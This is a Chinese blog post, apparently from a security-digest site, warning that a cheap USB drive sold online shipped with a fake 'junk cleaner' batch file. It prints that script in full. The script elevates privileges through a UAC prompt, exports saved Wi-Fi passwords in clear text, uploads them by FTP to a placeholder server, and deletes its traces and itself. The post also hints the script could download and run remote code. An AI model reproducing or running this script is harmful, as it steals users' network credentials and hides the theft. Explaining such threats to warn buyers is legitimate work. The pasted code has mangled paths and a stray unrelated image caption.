在某宝个别店铺购买了小内存u盘到货后插入电脑,发现自带了一个名为电脑垃圾清理的小程序。
对就是这货
怀揣着这家店真好,还带了垃圾清理软件的想法,我试着运行了软件.
但是好像没有卵用.
正好小表弟好像对这个比较了解,我去问问他咋回事儿
小表弟下班回家后给我发了这么一段消息
嗯…
这是个bat脚本,他会打包本机的一些数据到一个文件夹里并全部发送到服务器上,然后删除痕迹和自身防止服务器信息泄露。
本文以WIFI信息获取并发送至服务器为例子
这个是代码
@echo off
>nul 2>&1 “%SYSTEMROOT%system32cacls.exe” “%SYSTEMROOT%system32configsystem”
if ‘%errorlevel%’ NEQ ‘0’ (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^(“Shell.Application”^) > “%temp%getadmin.vbs”
echo UAC.ShellExecute “%~s0”, “”, “”, “runas”, 1 >> “%temp%getadmin.vbs”
“%temp%getadmin.vbs”
exit /B
:gotAdmin
if exist “%temp%getadmin.vbs” ( del “%temp%getadmin.vbs” )
md c:win
netsh wlan export profile key=clear folder=c:win
echo open 服务器IP>C:config.txt
echo user FTP账号>>C:config.txt
echo FTP密码>>C:config.txt
echo mput c:win*.xml>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo yes>>C:config.txt
echo bye>>C:config.txt
ftp -n -s:”C:config.txt”
del C:config.txt
del C:win*.xml
del %0运行bat文件后,他会将电脑所连接过的WIFI信息发送至FTP目录
如图
随便打开其中一个就有了该WIFI相关信息
而假如bat批处理文件是一些远程下载运行的指令呢.
你猜猜后果是啥
来买个小内存u盘么咯?盘内带电脑垃圾清理.bat那种_安全文摘_黑白网
![c标签判断true false jsp_北京尚学堂卓越班252天[第042天]——Jsp](https://img-blog.csdnimg.cn/img_convert/00c9ba5e936785a81372b56771181bf2.png)
